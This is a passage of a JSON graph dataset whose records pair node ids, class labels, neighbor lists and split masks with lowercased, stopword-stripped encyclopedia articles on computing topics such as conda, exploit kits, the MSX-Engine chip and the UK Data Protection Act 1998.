    "text": "Squish_'em:squish 'em squish'em also known squish'em sam 1983 video game designed tony ngo published sirius software atari 8-bit family vic-20 commodore 64 msx colecovision console colecovision version features digitised speech without additional hardware published squish'em featuring sam game sequel sewer sam squish'em vertically scrolling game likened 1980 arcade game crazy climber players guide sam top uncompleted 48 storey buildings order collect suitcases money time sam reaches top building grabs money parachutes order attempt next building building represented grid girders connected vertically horizontally different patterns sometimes single way next storey building style buildings change grid layout colors change sam progresses game sam moves shimmying horizontally across grid climbing upwards moved storey climb back buildings patrolled dangerous enemies move horizontally across grid debris dropped sam must avoid making contact enemy without jumping hit falling debris results sam knocked building losing life player starts game four lives extra lives collected play 128 held player enemies 'squished jumped also jumped avoided ascending next storey enemy squished rendered harmless short period turning white becoming invulnerable enemy turned white must avoided jumped jumping enemies difficult landing squishing play progresses enemies become taller faster making harder squish avoid falling debris prevents players climbing many storeys enemies must avoided skillfully order prevent sam cornered invulnerable enemy tall easily jumped colecovision version game digitised speech employed sam performs certain actions instance exclaims squish 'em successfully attacking enemy money money money collecting suitcase top building one colecovision games contain speech unlike rival intellivision console colecovision lacks speech module craig holyoak deseret news rated colecovision version 3 5 praising game voice effects criticizing unoriginal despite boundaries technology pushed stated game contains plenty cute enabling appeal ages genders also stated little new keep experienced gamer long screen holyoak played game intensely number days lost interest mastering ability squish dangerous enemies finished stating less jaded looking climbing game new twist squish 'em may well unofficial homebrew clone even using name released atari 2600 2007",
    "neighbors": [
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5128,
    "label": 3,
    "text": "MSX-Engine:msx-engine msx-engine chip specially developed integrated circuit home computers built according msx specifications generally chip combines functions many separate older/simpler chips one done reduce required circuit board space power consumption importantly production costs complete systems first msx-engine chip t7775 operated next standard zilog z80-clone chip main cpu system later versions engine also included z80 clone cpu single chip package s-1990 special case really msx-engine chip used glue logic msx-engine external r800 cpu t9769 used msx 2 computers msx 1 computers mostly t7775 t7937 used also find s-1985 s-3527 systems msx 2 generation msx2+ onwards toshiba took complete production msx engine chips last generation msx turbo-r used nec s-1990 turbor bus controller together r800 cpu msx engine chips yamaha mostly used msx-computers sony philips toshiba chips mostly used computers sanyo matsushita panasonic/national short overview msx-engine chips note ic also used many msx2 computers include msx2-specific functions machines implemented using additional ic's s1990 msx-engine acts like bus controller combining element combines z80 inside t9769c actual msx engine r800 cpu memory slot logic hardware inside t9769c also contains hardware assists debugging software",
    "neighbors": [
      10018,
      8355,
      6889,
      4682,
      9006,
      1403,
      4796,
      5502
    ],
    "mask": "Test"
  },
  {
    "node_id": 5129,
    "label": 9,
    "text": "ADMB:admb admb ad model builder free open source software suite non-linear statistical modeling created david fournier developed admb project creation non-profit admb foundation ad ad model builder refers automatic differentiation capabilities come autodif library c++ language extension also created david fournier implements reverse mode automatic differentiation related software package admb-re provides additional support modeling random effects markov chain monte carlo methods integrated admb software making useful bayesian modeling addition bayesian hierarchical models admb provides support modeling random effects frequentist framework using laplace approximation importance sampling admb widely used scientists academic institutions government agencies international commissions commonly ecological modeling particular many fisheries stock assessment models built using software admb freely available new bsd license versions available windows linux mac os x opensolaris operating systems source code admb made publicly available march 2009 work david fournier 1970s development highly parameterized integrated statistical models fisheries motivated development autodif library ultimately admb likelihood equations models typically non-linear estimates parameters obtained numerical methods early fournier work became clear general numerical solutions likelihood problems could reliably achieved using function minimization algorithms incorporate accurate information gradients likelihood surface computing gradients i.e partial derivatives likelihood respect model variables must also done accuracy likelihood computation fournier developed protocol writing code compute required derivatives based chain rule differential calculus protocol similar suite methods came known reverse mode automatic differentiation statistical models using methods typically included eight constituent code segments model developers usually interested first constituents programming tools reduce overhead developing maintaining seven greatly increase productivity bjarne stroustrup began development c++ 1970s bell labs enhancement c programming language c++ spread widely 1989 c++ compilers available personal computers polymorphism c++ makes possible envisage programming system mathematical operators functions overloaded automatically compute derivative contributions every differentiable numerical operation computer program fournier formed otter research ltd. 1989 1990 autodif library included special classes derivative computation requisite overloaded functions c++ operators functions standard c++ math library autodif library automatically computes derivatives objective function accuracy objective function thereby frees developer onerous task writing maintaining derivative code statistical models equally important standpoint model development autodif library includes gradient stack quasi-newton function minimizer derivative checker container classes vectors matrices first application autodif library published 1992 autodif library however completely liberate developer writing model constituents listed 1993 fournier abstracted writing statistical models creating admb special template language simplify model specification creating tools transform models written using templates autodif library applications admb produces code manage exchange model parameters model function minimizer automatically computes hessian matrix inverts provide estimate covariance estimated parameters admb thus completes liberation model developer tedious overhead managing non-linear optimization thereby freeing focus interesting aspects statistical model mid-1990s admb earned acceptance researchers working aspects resource management population models based admb used monitor range endangered species commercially valuable fish populations including whales dolphins sea lions penguins albatross abalone lobsters tunas marlins sharks rays anchovy pollock admb also used reconstruct movements many species animals tracked electronic tags 2002 fournier teamed hans skaug introduce random effects admb development included automatic computation second third derivatives use forward mode automatic differentiation followed two sweeps reverse model ad certain cases 2007 group admb users included john sibert mark maunder anders nielsen became concerned admb long-term development maintenance agreement reached otter research sell copyright admb purpose making admb open-source project distributing without charge non-profit admb foundation created coordinate development promote use admb admb foundation drafted proposal gordon betty moore foundation funds purchase admb otter research moore foundation provided grant national center ecological analysis synthesis university california santa barbara late 2007 regents university california could purchase rights admb purchase completed mid-2008 complete admb libraries posted admb project website december 2008 may 2009 3000 downloads libraries occurred source code made available december 2009 mid-2010 admb supported common operating systems windows linux macos sun/sparc common c++ compilers gcc visual studio borland 32 64 bit architectures admb foundation efforts first two years admb project focused automating building admb different platforms streamlining installation creation user-friendly working environments planned technical developments include parallelization internal computations implementation hybrid mcmc improvement large sparse matrix use random effects models",
    "neighbors": [
      7301,
      7945,
      3980,
      2317,
      6797,
      15,
      7950,
      8079,
      2457,
      5148,
      7580,
      7326,
      7341,
      9133,
      7983,
      6962,
      823,
      6718,
      2242,
      5830,
      5703,
      4808,
      5833,
      5450,
      8262,
      2000,
      9944,
      2652,
      10848,
      11363,
      11239,
      4840,
      363,
      5612,
      5741,
      7148,
      7924
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5130,
    "label": 2,
    "text": "Conda_(package_manager):conda package manager conda open-source cross-platform language-agnostic package manager environment management system originally developed solve difficult package management challenges faced python data scientists today popular python/r package manager released berkeley software distribution license anaconda inc big difference conda pip package manager package dependencies managed significant challenge python data science reason conda created pip installs python package dependencies required whether conflict packages previously installed working installation example google tensorflow suddenly stop working pip-install new package needs different version numpy library insidiously everything might still appear work get different results unable reproduce results elsewhere n't pip-install order conda analyses current environment everything installed version limitations specify e.g want tensorflow 2.0 figures install compatible dependencies tell want ca n't done pip contrast install package specify dependencies even breaks packages conda allows users easily install different versions binary software packages required libraries appropriate computing platform also allows users switch package versions download install updates software repository conda written python programming language manage projects containing code written language e.g. r including multi-language projects conda install python programming language similar python-based cross-platform package managers wheel pip popular conda channel bioinformatics software bioconda provides multiple software distributions computational biology fact conda package environment manager included versions anaconda miniconda anaconda repository",
    "neighbors": [
      7684,
      6119,
      5833,
      8554,
      5067,
      5612,
      4302,
      11221,
      9151
    ],
    "mask": "Test"
  },
  {
    "node_id": 5131,
    "label": 4,
    "text": "Exploit_kit:exploit kit exploit kit simply collection exploits simple one-in-all tool managing variety exploits altogether exploit kits act kind repository make easy users without much technical knowledge use exploits users add exploits use simultaneously apart pre-installed ones one earlier kits mpack 2006 exploit kits often designed modular easy use enabling addition new vulnerabilities removal existing ones exploit kits also provide user interface person controls typically includes information success rates types statistics well ability control settings typical kit collection php scripts target security holes commonly used programs apple quicktime mozilla firefox widely used software oracle java adobe systems products targeted particularly often exploit kits come packed variety tools ranging hunting vulnerabilities automated exploitation security loopholes discovered basically follows simple hierarchy five steps hacking exploit kit gathers information victim machine finds vulnerabilities determines appropriate exploit delivers exploit typically silently drive-by downloads executes malware running post-exploitation modules maintain remote access compromised system lastly measure cover tracks uses special techniques like erasing logs avoid detection days pass exploit kits becoming ever sophisticated tend neatly packaged require understanding exploits little computer proficiency kits may web interface showing active victims statistics may support period updates like commercial software exploit kits sold cybercriminal circles often vulnerabilities already loaded onto study solutionary security engineering research team sert found 70 exploit kits released q4 2012 come russia followed china brazil 20 attributed typical relatively unsophisticated kit may cost us 500 per month licenses advanced kits reported cost much 10,000 per month exploit kits often encoded instead plain php prevent unlicensed use complicate anti-malware analysis research recorded future threat intelligence team revealed adobe flash player provided six top 10 vulnerabilities used exploit kits 2016 flash player popularity cyber criminals remains even increased adobe security issue mitigation efforts.kits continue include exploitation vulnerabilities patched years back continues significant population unpatched machines exploit kits tend deployed covertly legitimate web sites hacked unknown site operators visitors exploit kits named include mpack phoenix blackhole crimepack rig angler nuclear neutrino magnitude exploit kits",
    "neighbors": [
      3555,
      8644,
      901,
      10756,
      2857,
      107,
      3473,
      1970,
      4883,
      7515,
      4471,
      10392,
      7739,
      1979,
      10297
    ],
    "mask": "None"
  },
  {
    "node_id": 5132,
    "label": 7,
    "text": "CBRP:cbrp cbrp cluster based routing protocol routing protocol wireless mesh networks cbrp originally designed mid 1998 national university singapore subsequently published internet draft august 1998 cbrp one earlier hierarchical ad-hoc routing protocols cbrp nodes dynamically form clusters maintain structural routing support minimize excessive discovery traffic typical ad-hoc routing many performance studies cbrp conducted area vehicular ad-hoc network vanet cbrp shown perform moderately well large high density mesh networks",
    "neighbors": [
      9098,
      10021
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5133,
    "label": 4,
    "text": "Data_Protection_Act_1998:data protection act 1998 data protection act 1998 c 29 united kingdom act parliament designed protect personal data stored computers organised paper filing system enacted eu data protection directive 1995 provisions protection processing movement data dpa 1998 individuals legal rights control information act apply domestic use example keeping personal address book anyone holding personal data purposes legally obliged comply act subject exemptions act defined eight data protection principles ensure information processed lawfully superseded data protection act 2018 dpa 2018 23 may 2018 dpa 2018 supplements eu general data protection regulation gdpr came effect 25 may 2018 gdpr regulates collection storage use personal data significantly strictly 1998 act replaced data protection act 1984 access personal files act 1987 implemented eu data protection directive 1995 privacy electronic communications ec directive regulations 2003 altered consent requirement electronic marketing positive consent opt-in box exemptions remain marketing similar products services existing customers enquirers still given permission opt basis jersey data protection law modelled uk law section 1 defines personal data data used identify living individual anonymised aggregated data less regulated act providing anonymisation aggregation done reversible way individuals identified various means including name address telephone number email address act applies data held intended held computers 'equipment operating automatically response instructions given purpose held 'relevant filing system cases paper records may classified 'relevant filing system address book salesperson diary used support commercial activities freedom information act 2000 modified act public bodies authorities durant case modified interpretation act providing case law precedent person data processed following rights schedule 1 lists eight data protection principles personal data processed fairly lawfully order data classed 'fairly processed least one six conditions must applicable data schedule 2 except mentioned exceptions individual needs consent collection personal information use purpose question european data protection directive defines consent “ …any freely given specific informed indication wishes data subject signifies agreement personal data relating processed ” meaning individual may signify agreement writing however non-communication interpreted consent additionally consent appropriate age capacity individual circumstances case e.g. organisation intends continue hold use personal data relationship individual ends consent cover even consent given n't assumed last forever although cases consent lasts long personal data needs processed individuals may able withdraw consent depending nature consent circumstances personal information collected used data protection act also specifies sensitive personal data must processed according stricter set conditions particular consent must explicit act structured processing personal data covered act providing number exceptions part iv notable exceptions act grants acknowledges various police court powers act details number civil criminal offences data controllers may liable data controller failed gain appropriate consent data subject however 'consent specifically defined act common law matter uk data protection act large act reputation complexity basic principles honoured protecting privacy interpreting act always simple many companies organisations individuals seem unsure aims content principles act hide behind act refuse provide even basic publicly available material quoting act restriction act also impacts way organisations conduct business terms contacted marketing purposes telephone direct mail also electronically led development permission based marketing strategies definition personal data data relating living individual identified sensitive personal data concerns subject race ethnicity politics religion trade union status health sex life criminal record information commissioner office website states regarding subject access requests sars right find organisation using storing personal data called right access exercise right asking copy data commonly known making ‘ subject access request general data protection regulation gdpr came force 25 may 2018 organisations could charge specified fee responding sar £10 requests following gdpr copy personal data provided free organisation may charge additional copies charge fee thinks request ‘ manifestly unfounded excessive ’ may ask reasonable fee administrative costs associated request compliance act regulated enforced independent authority information commissioner office maintains guidance relating act january 2017 information commissioner office invited public comments eu ’ article 29 working party proposed changes data protection law anticipated introduction extensions interpretation act guide general data protection regulation",
    "neighbors": [
      2818,
      1934,
      3599,
      1169,
      3858,
      4133,
      3880,
      9901,
      3773,
      4037,
      7623,
      6344,
      845,
      6609,
      5461,
      5726,
      6885,
      11368,
      4732
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5134,
    "label": 9,
    "text": "Code_Morphing_Software:code morphing software code morphing software cms technology used transmeta microprocessors execute x86 instructions broad view cms reads x86 instructions generates instructions proprietary vliw processor style shade cms translation much expensive shade produces much higher quality code cms also contains interpreter simulates user-mode system mode operation",
    "neighbors": [
      7983,
      499,
      725,
      3071
    ],
    "mask": "Test"
  },
  {
    "node_id": 5135,
    "label": 4,
    "text": "Block_(Internet):block internet internet block ban technical measure intended restrict access information resources blocking inverse unblocking may implemented owners computers using software countries including china singapore block access certain news information united states children internet protection act requires schools receiving federal funded discount rates internet access install filter software blocks obscene content pornography applicable content harmful minors blocking may also refer denying access web server based ip address client machine certain websites including social networks facebook editable databases like wikimedia projects wikis users apply blocks based either ip number account users deemed undesirable prevent performing certain actions blocks kind may occur several reasons produce different effects social networks users unrestrictedly block users typically preventing sending messages viewing blocker information profile privileged users apply blocks affect access undesirables entire website blocking used moderators administrators social media forums deny access users broken rules likely order ensure peaceful orderly discussion place common reasons blocking spamming trolling flaming criticize cases use bans administrators large websites twitter saying bans may politically financially motivated however websites legal right decide allowed post users often respond voting feet going place administrators see behavior acceptable blocked users may completely unable access part site content usually case censoring filtering mechanisms responsible block shadow ban user given false impression content still posted site reality hidden users ban evasion act attempting get around ban whether temporary permanent website alternate accounts set people evading bans websites referred sockpuppets typically someone caught evading ban sockpuppet sockpuppet account banned original ban temporary may extended even made permanent sometimes user ip address may banned well user access site create new accounts sites may remove traces ban-evader tv tropes wikipedia example may mass-delete pages created ban-evader ban evasion detected tracing user ip address two accounts using ip address could sign ban evasion also use vpn shown rapid drastic changes ip address user short period time also sign user trying get around ban ban evasion also spotted posts contributions two accounts look similar sites email associated multiple accounts identical similar emails sign ban evasion users permanently banned ban evasion may able appeal ban case sites tv tropes creating sockpuppets ban evaders use variety tactics disguise fact new account created previously banned user using new names alternate email address vpns proxy servers mask ip address changing ip address sometimes needing rely dynamic ip address automatically change time using site public internet access locations schools libraries",
    "neighbors": [
      4224,
      2884,
      2634,
      4725,
      5749,
      1627,
      9117
    ],
    "mask": "None"
  },
  {
    "node_id": 5136,
    "label": 4,
    "text": "Cryptographic_Module_Testing_Laboratory:cryptographic module testing laboratory cryptographic module testing laboratory cmtl information technology computer security testing laboratory accredited conduct cryptographic module evaluations conformance fips 140-2 u.s. government standard national institute standards technology nist national voluntary laboratory accreditation program nvlap accredits cmtls meet cryptographic module validation program cmvp standards procedures replaced fips 140-2 cryptographic module validation program cmvp laboratories must meet following requirements cmtl also common criteria cc testing laboratory cctl cc fips 140-2 different abstractness focus tests fips 140-2 testing defined cryptographic module provides suite conformance tests four fips 140 security levels fips 140-2 describes requirements cryptographic modules includes areas physical security key management self tests roles services etc standard initially developed 1994 prior development cc cc evaluation protection profile pp usually created user security target st typically pp covers broad range products operational environment modifiable operational environment operating system requirements common criteria applicable fips security levels 2",
    "neighbors": [
      6593,
      4067,
      420,
      8904,
      11432,
      1905,
      10962,
      2932,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 5137,
    "label": 3,
    "text": "SPARClite:sparclite discontinued sparclite risc processor family based 32-bit sparc v8 architecture manufactured approximately 1990s fujitsu designation mb8683x used many embedded applications including number early digital cameras followed fujitsu fr fr-v processors",
    "neighbors": [
      9137,
      1399
    ],
    "mask": "None"
  },
  {
    "node_id": 5138,
    "label": 4,
    "text": "Blackra1n:blackra1n blackra1n program jailbreaks versions 3.1 3.1.1 3.1.2 apple operating system iphone ipod touch known ios program uses bug usb code firmware iphone ipod touch allowing unsigned code executed blackra1n uses exploit patch firmware iphone ipod touch dfu device firmware upgrade mode mode used upgrading firmware itunes also activated user program allows users install cydia icy removed blackra1n rc3 rock package managers applications allow user access tweaks homebrew applications root directory file system ios device blackra1n also perform tethered jailbreaks ipod touch 3g iphone 3gs devices running os 3.1.2 ios 3.1.3 released spiritjb released provided untethered jailbreaks 3.1.2 3.1.3. blackra1n superseded spirit comex",
    "neighbors": [
      11584,
      1346,
      9762,
      9732,
      6537,
      5067,
      9518,
      7983,
      464,
      3473,
      9972,
      8918,
      4283,
      7420,
      4957
    ],
    "mask": "Test"
  },
  {
    "node_id": 5139,
    "label": 8,
    "text": "LYME_(software_bundle):lyme software bundle lyme lyce software stacks composed entirely free open-source software build high-availability heavy duty dynamic web pages stacks composed lyme lyce bundles combined many free open-source software packages e.g netsniff-ng security testing hardening snort intrusion detection ids intrusion prevention system ips rrdtool diagrams nagios collectd cacti monitoring databases mnesia couchdb well yaws also mochiweb misultin cowboy written erlang web applications developed lyme/lyce may run entirely one erlang virtual machine contrast lamp web server apache application written php perl python might process database always separate process result using erlang lyme lyce applications perform well high load distribution fault tolerance needed query data manipulation language mnesia also erlang rather sql therefore web-application lyme developed using single programming language interest lyme stack begun august 2005 soon cited high-performance web application platform used single development language throughout favorable comparisons popular stacks ruby rails soon forthcoming comparisons lamp also favourable although highlighted difficulties porting sql thinking different context mnesia successful user lyme swedish internet payment-processing company klarna built whole architecture lyme seen successful project demonstrates virtues lyme functional programming general lyme also covered erlang session software practice advancement spa 2008 besides yaws several web servers written erlang e.g mochiweb misultin cowboy besides mnesia couchdb couple databases written erlang e.g. cloudant couchbase server born membase database management system optimized storing data behind interactive web applications riak simpledb part amazon web services",
    "neighbors": [
      4616,
      3082,
      19,
      10780,
      10785,
      3618,
      6180,
      1580,
      2098,
      8242,
      4161,
      10817,
      8772,
      6213,
      8268,
      589,
      7248,
      593,
      6244,
      5222,
      10856,
      4207,
      5244,
      5245,
      4734,
      11391,
      7812,
      8326,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10413,
      10933,
      1211,
      5822,
      5824,
      1736,
      2762,
      6352,
      4831,
      8928,
      225,
      1761,
      2278,
      233,
      4841,
      7403,
      10482,
      8439,
      2809,
      7938,
      4360,
      1291,
      4367,
      1813,
      792,
      295,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      4423,
      6988,
      10063,
      2901,
      11095,
      865,
      8554,
      10091,
      8573,
      1920,
      8066,
      900,
      8582,
      6027,
      4493,
      11155,
      9621,
      1431,
      8602,
      3486,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      9646,
      1456,
      1972,
      9660,
      9667,
      8644,
      457,
      5067,
      8147,
      6625,
      2529,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 5140,
    "label": 0,
    "text": "Eurodicautom:eurodicautom eurodicautom pioneering terminology database european commission created 1975 initially use translators commission staff 1980 consultable line within commission european community grew expanded six seven nine finally eleven languages plus latin scientific names public user interfaces added later providing general public free access multilingual terminology fields activity european union students rennes university ufr2 lea technical translator terminologist department regularly worked reviewing creating entries existing database several languages 2007 eurodicautom replaced interactive terminology europe iate",
    "neighbors": [
      8284,
      2901
    ],
    "mask": "None"
  },
  {
    "node_id": 5141,
    "label": 3,
    "text": "SUN_workstation:sun workstation sun workstation modular computer system designed stanford university early 1980s became seed technology many commercial products including original workstations sun microsystems 1979 xerox donated alto computers developed palo alto research center stanford computer science department well universities developing early internet altos connected using ethernet form several local area networks sun design inspired alto used lower-cost modular components project name derived initials campus stanford university network professor forest baskett suggested best-known configuration relatively low-cost personal workstation computer-aided logic design work design created 3m computer 1 million instructions per second mips processor 1 megabyte memory 1 megapixel raster scan bit-map graphics display sometimes 10,000 estimated price called fourth — megapenny director computer facilities ralph gorin suggested configurations initially funded project graduate student andy bechtolsheim designed hardware several students staff members assisting software aspects project vaughan pratt became unofficial faculty leader project 1980 three key technologies made sun workstation possible large-scale integration vlsi integrated circuits multibus ecad ecad electronic computer assisted design known electronic design automation allowed single designer quickly develop systems greater complexity stanford artificial intelligence laboratory sail pioneered personal display terminals 1971 system showing age bechtolsheim used stanford university drawing system suds design sun boards sail system suds originally developed foonly computer structured computer aided logic design scald package used verify design automate layout produce wire-wrapped prototypes printed circuit boards vlsi integrated circuits finally allowed high-level hardware functionality included single chip graphics display controller first board designed published 1980 motorola 68000 cpu along memory parallel port controller serial port controller included main cpu board designed bechtolsheim third board interface 2.94 mbits/second experimental ethernet speed standardized 10 mbits/second multibus computer interface made possible use standard enclosures use circuit boards made different vendors create configurations example cpu board combined multi-port serial controller created terminal server called tip terminal interface processor connected many terminals digital equipment corporation time-sharing systems stanford anywhere internet configuring multiple ethernet controllers including commercial ones available one cpu board created router william yeager wrote software later adopted evolved cisco systems version hardware les earnest licensed cpu board one first commercial low-cost laser printer controllers company called imagen processor board combined prototype high performance graphics display students james h. clark group later formed silicon graphics incorporated eventually ten sun workstations built 1981 1982 stanford declined build bechtolsheim licensed hardware design several vendors frustrated none chosen build workstation vinod khosla also stanford convinced bechtolsheim along scott mcnealy found sun microsystems order build sun-1 workstation included improvements earlier design faculty members research using sun workstations included david cheriton brian reid john hennessy",
    "neighbors": [
      9665,
      10051,
      5829,
      7269,
      1809,
      6834,
      1398,
      5115
    ],
    "mask": "Test"
  },
  {
    "node_id": 5142,
    "label": 6,
    "text": "Novell_Storage_Services:novell storage services novell storage services nss file system used novell netware operating system support nss introduced 2004 suse linux via low-level network ncpfs protocol unique features make especially useful setting shared volumes file server local area network nss 64-bit journaling file system balanced tree algorithm directory structure published specifications netware 6.5",
    "neighbors": [
      5120,
      2051,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      8214,
      3611,
      9249,
      9762,
      5158,
      3629,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      9343,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      2199,
      6297,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      3791,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      6494,
      10596,
      2407,
      10087,
      5492,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      11184,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 5143,
    "label": 2,
    "text": "Nokia_N80:nokia n80 nokia n80 3g smartphone nokia announced november 2 2005 part multimedia nseries line runs symbian os v9.1 s60 3rd edition interface first released june 2006 support high-speed umts/wcdma connections features include 3.1-megapixel camera interpolated 2.0-megapixels built-in flash front camera videoconferencing wi-fi 802.11g universal plug play upnp fm radio bluetooth 1.2 minisd memory card slot support 3d java games 2.1-inch display pixel density 259 ppi due 352x416 resolution 2.1 displaymaking one nokia sharpest displays 2005 2006 n80 world first upnp-compatible phone allowing transfer media files compatible devices wi-fi n80 officially described multimedia computer nokia like successor nokia n95 nokia originally announced n80 supporting bluetooth 2.0 however released bluetooth 1.2 therefore n80 currently support stereo playback bluetooth nokia n80 internet edition second version handset hardware normal n80 released q4 2006 available patina bronze pearl black following additional software included january 2007 pearl black model available sale us 499 nokia announced new internet edition firmware available 'classic n80 using nokia official software updater downloadable nokia.com internet edition firmware made available nokia software updater end users could update n80 specification n80 internet edition flashing n80 firmware n80 internet edition required use several hacked nokia servicing software applications including phoenix service software nokia software update nemesis changing product code method questionable legality jurisdictions may violate terms phone warranty reports occasional failure method due user error unknown reasons leaving phone unusable state properly-equipped service center could recover",
    "neighbors": [
      1537,
      8577,
      3205,
      11655,
      1674,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      7063,
      2072,
      8472,
      5274,
      5019,
      5659,
      669,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      690,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      6870,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      8433,
      5875,
      1533
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5144,
    "label": 3,
    "text": "Orion_(system-on-a-chip):orion system-on-a-chip orion system-on-a-chip manufactured marvell technology group used network-attached storage based armv5te architecture on-chip support ethernet sata usb used hardware made hewlett-packard d-link among others supported lenny release debian gnu/linux",
    "neighbors": [
      5384,
      9964
    ],
    "mask": "Test"
  },
  {
    "node_id": 5145,
    "label": 4,
    "text": "HP_MediaSmart_Server:hp mediasmart server hp mediasmart server home server hewlett-packard ran microsoft windows home server operating system october 2008 hp mediasmart server sold two models ex470 rrp us 599 ex475 rrp us 749 feature 1.8 ghz amd sempron 3400+ processor one gigabit ethernet port four internal sata drive bays four usb 2.0 ports one esata port two models identical exception amount included storage ex470 one 500 gb hard drive preinstalled ex475 two 500 gb hard drives preinstalled hackers enthusiasts modded ex470 adding vga monitor upgrading memory 512 mb 2 gb upgrading processor 2.6 ghz amd le-1640 december 29 2008 hp announced two models ex485 ex487 available pre-orders starting january 8 2009 newer models include support apple time machine backup software also use 2.0 ghz intel celeron processor replacing amd sempron old models features include revamped user interface larger preinstalled hard drives one 750 gb drive ex485 two 750 gb drives ex487 april 30 2009 hp announced mediasmart server lx195 intended low-cost entry home server market new model featured single internal 640 gb drive 1.6 ghz intel atom 230 processor 1 gb ddr2 memory gigabit ethernet four usb ports storage expansion software features included lx195 initial launch features ex485/ex487 server september 14 2009 hp launched two new mediasmart servers ex490 comes 1 tb hard disk storage costs 549 ex495 comes 1.5 tb costs 699 7200 rpm 490 comes intel celeron processor 2.2 ghz 495 intel pentium processor dual core 2.5 ghz november 30 2010 windows home server team microsoft confirmed rumors hp would offering hardware next version windows home server codenamed vail hp would stop selling mediasmart servers altogether end calendar year 2010",
    "neighbors": [
      5384,
      2196,
      7983
    ],
    "mask": "Train"
  },
  {
    "node_id": 5146,
    "label": 5,
    "text": "Silly_window_syndrome:silly window syndrome silly window syndrome problem computer networking caused poorly implemented tcp flow control serious problem arise sliding window operation sending application program creates data slowly receiving application program consumes data slowly server problem unable process incoming data requests clients reduce amount data send time window setting tcp packet server continues unable process incoming data window becomes smaller smaller sometimes point data transmitted smaller packet header making data transmission extremely inefficient name problem due window size shrinking silly value since certain amount overhead associated processing packet increased number packets means increased overhead process decreasing amount data end result thrashing synchronization sender receiver regarding capacity flow data size packet window syndrome problem created silly window syndrome created sender nagle algorithm used nagle solution requires sender send first segment even small one wait ack received maximum sized segment mss accumulated silly window syndrome created receiver david clark solution used clark solution closes window another segment maximum segment size mss received buffer half empty 3 causes sws sws efficiency communication almost 0 sws duration short possible heuristic method send tcp must allow sending application make write calls collect data transferred call transmitting large segment sending tcp delays sending segments accumulate reasonable amounts data known clumping heuristic method receiver uses maintain internal record available window delay advertising increase window size sender advance significant amount amount depends receiver buffer size maximum segment size using method prevents small window advertisements received applications extract data octets slowly",
    "neighbors": [
      4490,
      10924,
      3725,
      5840,
      5906,
      4918
    ],
    "mask": "Test"
  },
  {
    "node_id": 5147,
    "label": 1,
    "text": "Norwegian_International_Ship_Register:norwegian international ship register norwegian international ship register nis separate norwegian ship register norwegian vessels aimed competing flags convenience registers panama liberia originally proposed erling dekke næss 1984 established bergen 1987 managed norwegian ship registers 2010 12th ship register gross tonnage representing 1 global tonnage years register established norwegian register lost could compete lower-cost registers main objectives establishing register register highly successful 2002 880 vessels register total around criticism countries opened second registers norway nis germany gis denmark dis fewer restrictions nationality crew allegedly lower safety standards main national register",
    "neighbors": [
      3090,
      676,
      6605,
      6726
    ],
    "mask": "None"
  },
  {
    "node_id": 5148,
    "label": 9,
    "text": "DADiSP:dadisp dadisp data analysis display pronounced day-disp numerical computing environment developed dsp development corporation allows one display manipulate data series matrices images interface similar spreadsheet dadisp used study signal processing numerical analysis statistical physiological data processing dadisp designed perform technical data analysis spreadsheet like environment however unlike typical business spreadsheet operates table cells contain single scalar values dadisp worksheet consists multiple interrelated windows window contains entire series multi-column matrix window stores data also displays data several interactive forms including 2d graphs xyz plots 3d surfaces images numeric tables like traditional spreadsheet windows linked change data one window automatically updates dependent windows numerically graphically users manipulate data primarily windows dadisp window normally referred letter w followed window number w1 example formula codice_1 assigns series values 1 2 3 w1 formula codice_2 sets second window compute square value w1 w2 contain series 1 4 9 values w1 change 3 5 2 4 values w2 automatically update 9 25 4 16 dadisp includes series based programming language called spl series processing language used implement custom algorithms spl c/c++ like syntax incrementally compiled intermediate bytecode executed virtual machine spl supports standard variables assigned codice_3 hot variables assigned codice_4 example statement codice_5 assigns series 1 2 3 standard variable square values assigned codice_6 variable b contains series 1 3 9 changes b change b preserves values assigned without regard future state however statement codice_7 creates hot variable hot variable analogous window except hot variables display data assignment codice_8 computes square values changes b automatically updates setting codice_9 causes b automatically update 9 25 4 16 dadisp originally developed early 1980s part research project mit explore aerodynamics formula one racing cars original goal project enable researchers quickly explore data analysis algorithms without need traditional programming",
    "neighbors": [
      9345,
      5380,
      7301,
      5129,
      3980,
      6797,
      15,
      8079,
      7580,
      7326,
      7341,
